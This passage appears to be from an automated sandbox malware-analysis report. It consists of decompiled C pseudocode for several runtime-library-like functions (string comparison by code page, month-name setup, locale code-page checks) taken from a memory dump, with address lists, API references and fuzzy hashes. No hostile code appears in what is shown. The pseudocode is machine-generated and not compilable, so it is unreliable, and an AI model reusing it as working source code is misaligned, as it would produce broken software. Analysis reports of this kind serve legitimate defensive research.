				void* __esi;
				signed int _t49;
				int _t54;
				signed int _t59;
				signed int _t60;
				void* _t63;
				signed int _t64;
				signed int _t65;
				int _t71;
				char* _t76;
				char* _t77;
				int _t81;
				int _t82;
				intOrPtr _t94;
				intOrPtr _t95;
				signed int _t103;
				void* _t104;
				int _t106;
				void* _t107;
				intOrPtr* _t108;

				_t49 =  *0xd40014; // 0xfbddd969
				_v8 = _t49 ^ _t103;
				_t83 = _a24;
				_v40 = _a4;
				_t102 = _a20;
				_v44 = _a8;
				_t53 = _a16;
				_v32 = _a16;
				_v36 = _a24;
				if(_t102 <= 0) {
					if(_t102 < 0xffffffff) {
						goto L54;
					} else {
						goto L3;
					}
				} else {
					_t81 = L00D20E9F(_t53, _t102);
					_t83 = _v36;
					_t102 = _t81;
					L3:
					_t101 = _a28;
					if(_t101 <= 0) {
						if(_t101 < 0xffffffff) {
							goto L54;
						} else {
							goto L6;
						}
					} else {
						_t101 = L00D20E9F(_t83, _t101);
						_a28 = _t101;
						L6:
						_t82 = _a32;
						if(_t82 == 0) {
							_t82 =  *( *_v40 + 8);
							_a32 = _t82;
						}
						if(_t102 == 0 || _t101 == 0) {
							if(_t102 == _t101) {
								L61:
								_push(2);
								goto L23;
							} else {
								if(_t101 > 1) {
									L32:
									_t54 = 1;
								} else {
									if(_t102 > 1) {
										L22:
										_push(3);
										goto L23;
									} else {
										if(GetCPInfo(_t82,  &_v28) == 0) {
											goto L54;
										} else {
											if(_t102 <= 0) {
												if(_t101 <= 0) {
													goto L33;
												} else {
													if(_v28 >= 2) {
														_t76 =  &_v22;
														if(_v22 != 0) {
															_t101 = _v36;
															while(1) {
																_t94 =  *((intOrPtr*)(_t76 + 1));
																if(_t94 == 0) {
																	goto L32;
																}
																_t100 =  *_t101;
																if(_t100 <  *_t76 || _t100 > _t94) {
																	_t76 = _t76 + 2;
																	if( *_t76 != 0) {
																		continue;
																	} else {
																		goto L32;
																	}
																} else {
																	goto L61;
																}
																goto L55;
															}
														}
													}
													goto L32;
												}
											} else {
												if(_v28 >= 2) {
													_t77 =  &_v22;
													if(_v22 != 0) {
														_t102 = _v32;
														while(1) {
															_t95 =  *((intOrPtr*)(_t77 + 1));
															if(_t95 == 0) {
																goto L22;
															}
															_t100 =  *_t102;
															if(_t100 <  *_t77 || _t100 > _t95) {
																_t77 = _t77 + 2;
																if( *_t77 != 0) {
																	continue;
																} else {
																	goto L22;
																}
															} else {
																goto L61;
															}
															goto L23;
														}
													}
												}
												goto L22;
												L23:
												_pop(_t54);
											}
										}
									}
								}
							}
						} else {
							L33:
							_t59 = E00D1840F(_t82, 9, _v32, _t102, 0, 0);
							_t106 = _t104 + 0x18;
							_v40 = _t59;
							if(_t59 == 0) {
								L54:
								_t54 = 0;
							} else {
								_t100 = _t59 + _t59 + 8;
								asm("sbb eax, eax");
								_t60 = _t59 & _t59 + _t59 + 0x00000008;
								if(_t60 == 0) {
									L60:
									_push(0);
									goto L59;
								} else {
									if(_t60 > 0x400) {
										_t82 = E00CC2990(_t60);
										if(_t82 == 0) {
											goto L60;
										} else {
											 *_t82 = 0xdddd;
											goto L40;
										}
									} else {
										L00CFEF30(_t60);
										_t82 = _t106;
										if(_t82 == 0) {
											goto L60;
										} else {
											 *_t82 = 0xcccc;
											L40:
											_t82 = _t82 + 8;
											if(_t82 == 0) {
												goto L60;
											} else {
												_t102 = _a32;
												_t63 = E00D1840F(_a32, 1, _v32, _a32, _t82, _v40);
												_t107 = _t106 + 0x18;
												if(_t63 == 0) {
													L58:
													_push(_t82);
													L59:
													L00D14F77();
													goto L53;
												} else {
													_t101 = _v36;
													_t64 = E00D1840F(_t102, 9, _v36, _v36, 0, 0);
													_t108 = _t107 + 0x18;
													_v32 = _t64;
													if(_t64 == 0) {
														goto L58;
													} else {
														_t100 = _t64 + _t64 + 8;
														asm("sbb eax, eax");
														_t65 = _t64 & _t64 + _t64 + 0x00000008;
														if(_t65 == 0) {
															L57:
															_push(0);
															goto L52;
														} else {
															if(_t65 > 0x400) {
																_t101 = E00CC2990(_t65);
																if(_t101 == 0) {
																	goto L57;
																} else {
																	 *_t101 = 0xdddd;
																	goto L49;
																}
															} else {
																L00CFEF30(_t65);
																_t101 = _t108;
																if(_t101 == 0) {
																	goto L57;
																} else {
																	 *_t101 = 0xcccc;
																	L49:
																	_t101 = _t101 + 8;
																	if(_t101 == 0) {
																		goto L57;
																	} else {
																		if(E00D1840F(_t102, 1, _v36, _a28, _t101, _v32) != 0) {
																			_t71 = L00D15CD5(_v44, _a12, _t82, _v40, _t101, _v32, 0, 0, 0);
																			_t102 = _t71;
																			L00D14F77(_t101);
																			L00D14F77(_t82);
																			_t54 = _t71;
																		} else {
																			_push(_t101);
																			L52:
																			L00D14F77();
																			L00D14F77(_t82);
																			L53:
																			goto L54;
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L55:
				return E00CFE643(_t54, _t82, _v8 ^ _t103, _t100, _t101, _t102);
			}

0x00d1d014
0x00d1d01b
0x00d1d021
0x00d1d025
0x00d1d02c
0x00d1d02f
0x00d1d032
0x00d1d035
0x00d1d038
0x00d1d03e
0x00d1d053
0x00000000
0x00000000
0x00000000
0x00000000
0x00d1d040
0x00d1d042
0x00d1d049
0x00d1d04c
0x00d1d059
0x00d1d059
0x00d1d05e
0x00d1d073
0x00000000
0x00000000
0x00000000
0x00000000
0x00d1d060
0x00d1d068
0x00d1d06b
0x00d1d079
0x00d1d079
0x00d1d07e
0x00d1d085
0x00d1d088
0x00d1d088
0x00d1d08d
0x00d1d099
0x00d1d2a4
0x00d1d2a4
0x00000000
0x00d1d09f
0x00d1d0a2
0x00d1d12e
0x00d1d130
0x00d1d0a8
0x00d1d0ab
0x00d1d0f3
0x00d1d0f3
0x00000000
0x00d1d0ad
0x00d1d0ba
0x00000000
0x00d1d0c0
0x00d1d0c2
0x00d1d0fd
0x00000000
0x00d1d0ff
0x00d1d103
0x00d1d109
0x00d1d10c
0x00d1d10e
0x00d1d111
0x00d1d111
0x00d1d116
0x00000000
0x00000000
0x00d1d118
0x00d1d11c
0x00d1d126
0x00d1d12c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00d1d11c
0x00d1d111
0x00d1d10c
0x00000000
0x00d1d103
0x00d1d0c4
0x00d1d0c8
0x00d1d0ce
0x00d1d0d1
0x00d1d0d3
0x00d1d0d6
0x00d1d0d6
0x00d1d0db
0x00000000
0x00000000
0x00d1d0dd
0x00d1d0e1
0x00d1d0eb
0x00d1d0f1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00d1d0e1
0x00d1d0d6
0x00d1d0d1
0x00000000
0x00d1d0f5
0x00d1d0f5
0x00d1d0f5
0x00d1d0c2
0x00d1d0ba
0x00d1d0ab
0x00d1d0a2
0x00d1d136
0x00d1d136
0x00d1d141
0x00d1d146
0x00d1d149
0x00d1d14e
0x00d1d254
0x00d1d254
0x00d1d154
0x00d1d157
0x00d1d15c
0x00d1d15e
0x00d1d160
0x00d1d2a0
0x00d1d2a0
0x00000000
0x00d1d166
0x00d1d16b
0x00d1d18a
0x00d1d18f
0x00000000
0x00d1d195
0x00d1d195
0x00000000
0x00d1d195
0x00d1d16d
0x00d1d16d
0x00d1d172
0x00d1d176
0x00000000
0x00d1d17c
0x00d1d17c
0x00d1d19b
0x00d1d19b
0x00d1d1a0
0x00000000
0x00d1d1a6
0x00d1d1ae
0x00d1d1b4
0x00d1d1b9
0x00d1d1be
0x00d1d298
0x00d1d298
0x00d1d299
0x00d1d299
0x00000000
0x00d1d1c4
0x00d1d1c9
0x00d1d1d0
0x00d1d1d5
0x00d1d1d8
0x00d1d1dd
0x00000000
0x00d1d1e3
0x00d1d1e6
0x00d1d1eb
0x00d1d1ed
0x00d1d1ef
0x00d1d294
0x00d1d294
0x00000000
0x00d1d1f5
0x00d1d1fa
0x00d1d219
0x00d1d21e
0x00000000
0x00d1d220
0x00d1d220
0x00000000
0x00d1d220
0x00d1d1fc
0x00d1d1fc
0x00d1d201
0x00d1d205
0x00000000
0x00d1d20b
0x00d1d20b
0x00d1d226
0x00d1d226
0x00d1d22b
0x00000000
0x00d1d22d
0x00d1d244
0x00d1d27b
0x00d1d281
0x00d1d283
0x00d1d289
0x00d1d290
0x00d1d246
0x00d1d246
0x00d1d247
0x00d1d247
0x00d1d24d
0x00d1d253
0x00000000
0x00d1d253
0x00d1d244
0x00d1d22b
0x00d1d205
0x00d1d1fa
0x00d1d1ef
0x00d1d1dd
0x00d1d1be
0x00d1d1a0
0x00d1d176
0x00d1d16b
0x00d1d160
0x00d1d14e
0x00d1d08d
0x00d1d05e
0x00d1d256
0x00d1d267

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,00D1CFF7,00000000,00000000,00000000,00000001,?,?,?,?,00000001,00000000), ref: 00D1D0B2
__freea.LIBCMT ref: 00D1D247
__freea.LIBCMT ref: 00D1D24D
__freea.LIBCMT ref: 00D1D283
__freea.LIBCMT ref: 00D1D289
__freea.LIBCMT ref: 00D1D299

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: __freea$Info
String ID:
API String ID: 541289543-0
Opcode ID: 4eac77ff86f0848a87a77498e8dc3a8410a2cf686e27df9534cd5974d14d16e7
Instruction ID: f2c38910c7fb6e62c209aa562a5517f569a37015cbb13ceee321292e7a705249
Opcode Fuzzy Hash: 4eac77ff86f0848a87a77498e8dc3a8410a2cf686e27df9534cd5974d14d16e7
Instruction Fuzzy Hash: 6471A172A00259BBDF209EA4AC41BEE77A7DF49310F290059E954A7281DF35DCC2C7B4

Uniqueness

Uniqueness Score: -1.00%

Function 00CB1510 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 289
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00CB1510(void* __fp0) {
				void* __ebx;
				void* __edi;
				intOrPtr _t23;
				intOrPtr _t25;
				void* _t39;
				intOrPtr* _t40;
				intOrPtr* _t41;
				signed int _t42;
				void* _t69;
				intOrPtr* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				intOrPtr* _t74;
				intOrPtr* _t75;
				intOrPtr* _t76;
				intOrPtr* _t77;
				intOrPtr* _t78;
				intOrPtr* _t79;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t84;
				intOrPtr* _t85;
				intOrPtr* _t86;
				intOrPtr* _t87;
				intOrPtr* _t88;
				intOrPtr* _t89;
				intOrPtr* _t90;
				intOrPtr* _t91;
				intOrPtr* _t92;
				intOrPtr* _t93;
				void* _t123;

				_t123 = __fp0;
				_t23 =  *0xd465f8; // 0x0
				_t42 =  *0xd43e38; // 0x0
				_t43 =  *((intOrPtr*)( *[fs:0x2c] + _t42 * 4));
				if(_t23 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t42 * 4)) + 4))) {
					L00CFDC67(_t23, 0xd465f8);
					__eflags =  *0xd465f8 - 0xffffffff;
					if(__eflags == 0) {
						E00CFDF39(_t43, __eflags, E00CB3100);
						L00CFDCDD(0xd465f8);
					}
				}
				if( *0xd464e3 < 0) {
					 *0xd464dc = 7;
					_t71 =  *0xd464d8; // 0x0
				} else {
					_t71 = 0xd464d8;
					E00C9A150(_t39, 0xd464d8, _t69, _t123, 7);
				}
				 *((intOrPtr*)(_t71 + 3)) = 0x79726175;
				 *_t71 = 0x756e614a;
				 *((char*)(_t71 + 7)) = 0;
				if( *0xd464ef < 0) {
					 *0xd464e8 = 8;
					_t72 =  *0xd464e4; // 0x0
				} else {
					_t72 = 0xd464e4;
					E00C9A150(_t39, 0xd464e4, _t69, _t123, 8);
				}
				 *((intOrPtr*)(_t72 + 4)) = 0x79726175;
				 *_t72 = 0x72626546;
				 *((char*)(_t72 + 8)) = 0;
				if( *0xd464fb < 0) {
					 *0xd464f4 = 5;
					_t73 =  *0xd464f0; // 0x0
				} else {
					_t73 = 0xd464f0;
					E00C9A150(_t39, 0xd464f0, _t69, _t123, 5);
				}
				 *_t73 = 0x6372614d;
				 *((short*)(_t73 + 4)) = 0x68;
				if( *0xd46507 < 0) {
					 *0xd46500 = 5;
					_t74 =  *0xd464fc; // 0x0
				} else {
					_t74 = 0xd464fc;
					E00C9A150(_t39, 0xd464fc, _t69, _t123, 5);
				}
				 *_t74 = 0x69727041;
				 *((short*)(_t74 + 4)) = 0x6c;
				if( *0xd46513 < 0) {
					 *0xd4650c = 3;
					_t75 =  *0xd46508; // 0x0
				} else {
					_t75 = 0xd46508;
					E00C9A150(_t39, 0xd46508, _t69, _t123, 3);
				}
				 *_t75 = 0x79614d;
				if( *0xd4651f < 0) {
					 *0xd46518 = 4;
					_t76 =  *0xd46514; // 0x0
				} else {
					_t76 = 0xd46514;
					E00C9A150(_t39, 0xd46514, _t69, _t123, 4);
				}
				 *_t76 = 0x656e754a;
				 *((char*)(_t76 + 4)) = 0;
				if( *0xd4652b < 0) {
					 *0xd46524 = 4;
					_t77 =  *0xd46520; // 0x0
				} else {
					_t77 = 0xd46520;
					E00C9A150(_t39, 0xd46520, _t69, _t123, 4);
				}
				 *_t77 = 0x796c754a;
				 *((char*)(_t77 + 4)) = 0;
				if( *0xd46537 < 0) {
					 *0xd46530 = 6;
					_t78 =  *0xd4652c; // 0x0
				} else {
					_t78 = 0xd4652c;
					E00C9A150(_t39, 0xd4652c, _t69, _t123, 6);
				}
				 *((short*)(_t78 + 4)) = 0x7473;
				 *_t78 = 0x75677541;
				 *((char*)(_t78 + 6)) = 0;
				if( *0xd46543 < 0) {
					 *0xd4653c = 9;
					_t79 =  *0xd46538; // 0x0
				} else {
					_t79 = 0xd46538;
					E00C9A150(_t39, 0xd46538, _t69, _t123, 9);
				}
				 *((intOrPtr*)(_t79 + 4)) = 0x65626d65;
				 *_t79 = 0x74706553;
				 *((short*)(_t79 + 8)) = 0x72;
				if( *0xd4654f < 0) {
					 *0xd46548 = 7;
					_t80 =  *0xd46544; // 0x0
				} else {
					_t80 = 0xd46544;
					E00C9A150(_t39, 0xd46544, _t69, _t123, 7);
				}
				 *((intOrPtr*)(_t80 + 3)) = 0x7265626f;
				 *_t80 = 0x6f74634f;
				 *((char*)(_t80 + 7)) = 0;
				if( *0xd4655b < 0) {
					 *0xd46554 = 8;
					_t40 =  *0xd46550; // 0x0
				} else {
					_t40 = 0xd46550;
					E00C9A150(0xd46550, 0xd46550, _t69, _t123, 8);
				}
				_t25 = 0x65766f4e;
				 *_t40 = 0x65766f4e;
				 *((intOrPtr*)(_t40 + 4)) = 0x7265626d;
				 *((char*)(_t40 + 8)) = 0;
				if( *0xd46567 < 0) {
					 *0xd46560 = 8;
					_t41 =  *0xd4655c; // 0x0
				} else {
					_t41 = 0xd4655c;
					_t25 = E00C9A150(0xd4655c, 0xd4655c, 0x65636544, _t123, 8);
				}
				 *_t41 = 0x65636544;
				 *((intOrPtr*)(_t41 + 4)) = 0x7265626d;
				 *((char*)(_t41 + 8)) = 0;
				if( *0xd46573 < 0) {
					 *0xd4656c = 3;
					_t82 =  *0xd46568; // 0x0
				} else {
					_t82 = 0xd46568;
					_t25 = E00C9A150(_t41, 0xd46568, 0x65636544, _t123, 3);
				}
				 *_t82 = 0x6e614a;
				if( *0xd4657f < 0) {
					 *0xd46578 = 3;
					_t83 =  *0xd46574; // 0x0
				} else {
					_t83 = 0xd46574;
					_t25 = E00C9A150(_t41, 0xd46574, 0x65636544, _t123, 3);
				}
				 *_t83 = 0x626546;
				if( *0xd4658b < 0) {
					 *0xd46584 = 3;
					_t84 =  *0xd46580; // 0x0
				} else {
					_t84 = 0xd46580;
					_t25 = E00C9A150(_t41, 0xd46580, 0x65636544, _t123, 3);
				}
				 *_t84 = 0x72614d;
				if( *0xd46597 < 0) {
					 *0xd46590 = 3;
					_t85 =  *0xd4658c; // 0x0
				} else {
					_t85 = 0xd4658c;
					_t25 = E00C9A150(_t41, 0xd4658c, 0x65636544, _t123, 3);
				}
				 *_t85 = 0x727041;
				if( *0xd465a3 < 0) {
					 *0xd4659c = 3;
					_t86 =  *0xd46598; // 0x0
				} else {
					_t86 = 0xd46598;
					_t25 = E00C9A150(_t41, 0xd46598, 0x65636544, _t123, 3);
				}
				 *_t86 = 0x79614d;
				if( *0xd465af < 0) {
					 *0xd465a8 = 3;
					_t87 =  *0xd465a4; // 0x0
				} else {
					_t87 = 0xd465a4;
					_t25 = E00C9A150(_t41, 0xd465a4, 0x65636544, _t123, 3);
				}
				 *_t87 = 0x6e754a;
				if( *0xd465bb < 0) {
					 *0xd465b4 = 3;
					_t88 =  *0xd465b0; // 0x0
				} else {
					_t88 = 0xd465b0;
					_t25 = E00C9A150(_t41, 0xd465b0, 0x65636544, _t123, 3);
				}
				 *_t88 = 0x6c754a;
				if( *0xd465c7 < 0) {
					 *0xd465c0 = 3;
					_t89 =  *0xd465bc; // 0x0
				} else {
					_t89 = 0xd465bc;
					_t25 = E00C9A150(_t41, 0xd465bc, 0x65636544, _t123, 3);
				}
				 *_t89 = 0x677541;
				if( *0xd465d3 < 0) {
					 *0xd465cc = 3;
					_t90 =  *0xd465c8; // 0x0
				} else {
					_t90 = 0xd465c8;
					_t25 = E00C9A150(_t41, 0xd465c8, 0x65636544, _t123, 3);
				}
				 *_t90 = 0x706553;
				if( *0xd465df < 0) {
					 *0xd465d8 = 3;
					_t91 =  *0xd465d4; // 0x0
				} else {
					_t91 = 0xd465d4;
					_t25 = E00C9A150(_t41, 0xd465d4, 0x65636544, _t123, 3);
				}
				 *_t91 = 0x74634f;
				if( *0xd465eb < 0) {
					 *0xd465e4 = 3;
					_t92 =  *0xd465e0; // 0x0
				} else {
					_t92 = 0xd465e0;
					_t25 = E00C9A150(_t41, 0xd465e0, 0x65636544, _t123, 3);
				}
				 *_t92 = 0x766f4e;
				if( *0xd465f7 < 0) {
					 *0xd465f0 = 3;
					_t93 =  *0xd465ec; // 0x0
				} else {
					_t93 = 0xd465ec;
					_t25 = E00C9A150(_t41, 0xd465ec, 0x65636544, _t123, 3);
				}
				 *_t93 = 0x636544;
				return _t25;
			}

0x00cb1510
0x00cb1516
0x00cb151b
0x00cb1528
0x00cb1531
0x00cb1a57
0x00cb1a5f
0x00cb1a66
0x00cb1a71
0x00cb1a7e
0x00cb1a83
0x00cb1a66
0x00cb153e
0x00cb1553
0x00cb155d
0x00cb1540
0x00cb1540
0x00cb154c
0x00cb154c
0x00cb1563
0x00cb156a
0x00cb1570
0x00cb157b
0x00cb1590
0x00cb159a
0x00cb157d
0x00cb157d
0x00cb1589
0x00cb1589
0x00cb15a0
0x00cb15a7
0x00cb15ad
0x00cb15b8
0x00cb15cd
0x00cb15d7
0x00cb15ba
0x00cb15ba
0x00cb15c6
0x00cb15c6
0x00cb15dd
0x00cb15e3
0x00cb15f0
0x00cb1605
0x00cb160f
0x00cb15f2
0x00cb15f2
0x00cb15fe
0x00cb15fe
0x00cb1615
0x00cb161b
0x00cb1628
0x00cb163d
0x00cb1647
0x00cb162a
0x00cb162a
0x00cb1636
0x00cb1636
0x00cb164d
0x00cb165a
0x00cb166f
0x00cb1679
0x00cb165c
0x00cb165c
0x00cb1668
0x00cb1668
0x00cb167f
0x00cb1685
0x00cb1690
0x00cb16a5
0x00cb16af
0x00cb1692
0x00cb1692
0x00cb169e
0x00cb169e
0x00cb16b5
0x00cb16bb
0x00cb16c6
0x00cb16db
0x00cb16e5
0x00cb16c8
0x00cb16c8
0x00cb16d4
0x00cb16d4
0x00cb16eb
0x00cb16f1
0x00cb16f7
0x00cb1702
0x00cb1717
0x00cb1721
0x00cb1704
0x00cb1704
0x00cb1710
0x00cb1710
0x00cb1727
0x00cb172e
0x00cb1734
0x00cb1741
0x00cb1756
0x00cb1760
0x00cb1743
0x00cb1743
0x00cb174f
0x00cb174f
0x00cb1766
0x00cb176d
0x00cb1773
0x00cb177e
0x00cb1793
0x00cb179d
0x00cb1780
0x00cb1780
0x00cb178c
0x00cb178c
0x00cb17ad
0x00cb17b3
0x00cb17b5
0x00cb17bc
0x00cb17c7
0x00cb17dc
0x00cb17e6
0x00cb17c9
0x00cb17c9
0x00cb17d5
0x00cb17d5
0x00cb17ec
0x00cb17ee
0x00cb17f1
0x00cb17fc
0x00cb1811
0x00cb181b
0x00cb17fe
0x00cb17fe
0x00cb180a
0x00cb180a
0x00cb1821
0x00cb182e
0x00cb1843
0x00cb184d
0x00cb1830
0x00cb1830
0x00cb183c
0x00cb183c
0x00cb1853
0x00cb1860
0x00cb1875
0x00cb187f
0x00cb1862
0x00cb1862
0x00cb186e
0x00cb186e
0x00cb1885
0x00cb1892
0x00cb18a7
0x00cb18b1
0x00cb1894
0x00cb1894
0x00cb18a0
0x00cb18a0
0x00cb18b7
0x00cb18c4
0x00cb18d9
0x00cb18e3
0x00cb18c6
0x00cb18c6
0x00cb18d2
0x00cb18d2
0x00cb18e9
0x00cb18f6
0x00cb190b
0x00cb1915
0x00cb18f8
0x00cb18f8
0x00cb1904
0x00cb1904
0x00cb191b
0x00cb1928
0x00cb193d
0x00cb1947
0x00cb192a
0x00cb192a
0x00cb1936
0x00cb1936
0x00cb194d
0x00cb195a
0x00cb196f
0x00cb1979
0x00cb195c
0x00cb195c
0x00cb1968
0x00cb1968
0x00cb197f
0x00cb198c
0x00cb19a1
0x00cb19ab
0x00cb198e
0x00cb198e
0x00cb199a
0x00cb199a
0x00cb19b1
0x00cb19be
0x00cb19d3
0x00cb19dd
0x00cb19c0
0x00cb19c0
0x00cb19cc
0x00cb19cc
0x00cb19e3
0x00cb19f0
0x00cb1a05
0x00cb1a0f
0x00cb19f2
0x00cb19f2
0x00cb19fe
0x00cb19fe
0x00cb1a15
0x00cb1a22
0x00cb1a37
0x00cb1a41
0x00cb1a24
0x00cb1a24
0x00cb1a30
0x00cb1a30
0x00cb1a47
0x00cb1a51

APIs

__Init_thread_header.LIBCMT ref: 00CB1A57

Strings

ober, xrefs: 00CB1766
mber, xrefs: 00CB17B5
Dece, xrefs: 00CB17A8
mber, xrefs: 00CB17A3

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: Init_thread_header
String ID: Dece$mber$mber$ober
API String ID: 3738618077-56014211
Opcode ID: a0de0773b92a5a07d77358adca84012850d22cfcf704f535563fbb3fa256f450
Instruction ID: d0844a245457644f64226b186db3efef8df6d9f95c4287bbe1aa990f2daeff48
Opcode Fuzzy Hash: a0de0773b92a5a07d77358adca84012850d22cfcf704f535563fbb3fa256f450
Instruction Fuzzy Hash: 21D181B8808390CFEB159F54D8293043FA1A703714F58446DD98B6B3A9D7B5E988DBB3

Uniqueness

Uniqueness Score: -1.00%

Function 00D19930 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00D19930(void* __edx, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr _v0;
				intOrPtr* _v8;
				signed int _v12;
				signed int _v36;
				void* __ebx;
				void* __ecx;
				void* __esi;
				void* __ebp;
				void* _t36;
				short* _t37;
				intOrPtr* _t38;
				signed int _t40;
				intOrPtr* _t41;
				signed short _t42;
				signed short* _t45;
				intOrPtr _t48;
				void* _t50;
				void* _t66;
				void* _t70;
				void* _t71;
				intOrPtr* _t80;
				short* _t83;
				signed int _t86;
				void* _t87;
				intOrPtr* _t89;
				intOrPtr* _t93;
				signed int _t95;
				signed int _t106;
				void* _t107;
				signed int _t109;
				intOrPtr* _t111;
				intOrPtr _t113;
				void* _t114;
				void* _t116;
				intOrPtr* _t117;
				signed short _t119;
				signed int _t120;
				void* _t124;
				void* _t125;

				_push(_t87);
				_push(_t87);
				_push(_t116);
				_t111 = _a4;
				_t36 = E00D155BA(_t87, __edx, _t116);
				_t106 = 0;
				_v12 = 0;
				_t3 = _t36 + 0x50; // 0x50
				_t117 = _t3;
				_t4 = _t117 + 0x250; // 0x2a0
				_t37 = _t4;
				 *((intOrPtr*)(_t117 + 8)) = 0;
				 *_t37 = 0;
				_t6 = _t117 + 4; // 0x54
				_t80 = _t6;
				_v8 = _t37;
				_t89 = _t111;
				_t38 = _t111 + 0x80;
				 *_t117 = _t111;
				 *_t80 = _t38;
				if( *_t38 != 0) {
					_push(_t80);
					_push(0x16);
					_push(0xd29ef8);
					L40();
					_t89 =  *_t117;
					_t124 = _t124 + 0xc;
					_t106 = 0;
				}
				_push(_t117);
				if( *_t89 == _t106) {
					E00D1A03F(_t80, _t89);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t80)) == _t106) {
						L00D19F20();
					} else {
						L00D19B98(_t89);
					}
					if( *((intOrPtr*)(_t117 + 8)) == 0) {
						_push(_t117);
						_push(0x40);
						_push(0xd29be8);
						L40();
						_t124 = _t124 + 0xc;
						if(0 != 0) {
							_push(_t117);
							if( *((intOrPtr*)( *_t80)) == 0) {
								L00D19F20();
							} else {
								L00D19B98(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t117 + 8)) == 0) {
					L37:
					_t40 = 0;
					__eflags = 0;
					goto L38;
				} else {
					_t41 = _t111 + 0x100;
					if( *_t111 != 0 ||  *_t41 != 0) {
						_t42 = E00D1A0C6(_t41, _t117);
					} else {
						_t42 = GetACP();
					}
					_t119 = _t42;
					if(_t119 == 0 || _t119 == 0xfde8 || IsValidCodePage(_t119 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t45 = _a8;
						if(_t45 != 0) {
							 *_t45 = _t119;
						}
						_t113 = _a12;
						if(_t113 == 0) {
							L36:
							_t40 = 1;
							L38:
							return _t40;
						} else {
							_t93 = _v8;
							_t15 = _t113 + 0x120; // 0xd0
							_t83 = _t15;
							 *_t83 = 0;
							_t107 = _t93 + 2;
							do {
								_t48 =  *_t93;
								_t93 = _t93 + 2;
							} while (_t48 != _v12);
							_t95 = _t93 - _t107 >> 1;
							_push(_t95 + 1);
							_t50 = E00D1946F(_t95, _t83, 0x55, _v8);
							_t125 = _t124 + 0x10;
							if(_t50 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E00D170AC();
								asm("int3");
								_push(_t95);
								_push(_t119);
								_t120 = _v36;
								_push(_t113);
								_t109 = 1;
								_t114 = 0;
								__eflags = _t120;
								if(_t120 >= 0) {
									_push(_t83);
									while(1) {
										__eflags = _t109;
										if(_t109 == 0) {
											break;
										}
										asm("cdq");
										_t86 = _t114 + _t120 - _t109 >> 1;
										_v12 = _t86 * 0xc;
										_t109 = E00D100FF( *_a8,  *((intOrPtr*)(_t86 * 0xc + _v0)));
										__eflags = _t109;
										if(__eflags != 0) {
											if(__eflags >= 0) {
												_t114 = _t86 + 1;
											} else {
												_t120 = _t86 - 1;
											}
										} else {
											 *_a8 = _v12 + _v0 + 4;
										}
										__eflags = _t114 - _t120;
										if(_t114 <= _t120) {
											continue;
										}
										break;
									}
								}
								__eflags = _t109;
								_t35 = _t109 == 0;
								__eflags = _t35;
								return 0 | _t35;
							} else {
								if(L00D15EDC(_t83, 0x1001, _t113, 0x40) == 0) {
									goto L37;
								} else {
									_t20 = _t113 + 0x80; // 0x30
									_t83 = _t20;
									_t21 = _t113 + 0x120; // 0xd0
									if(L00D15EDC(_t21, 0x1002, _t83, 0x40) == 0) {
										goto L37;
									} else {
										_push(0x5f);
										_t66 = E00D017DB(_t95);
										_t95 = _t83;
										if(_t66 != 0) {
											L31:
											_t22 = _t113 + 0x120; // 0xd0
											if(L00D15EDC(_t22, 7, _t83, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_push(0x2e);
											_t71 = E00D017DB(_t95);
											_t95 = _t83;
											if(_t71 == 0) {
												L32:
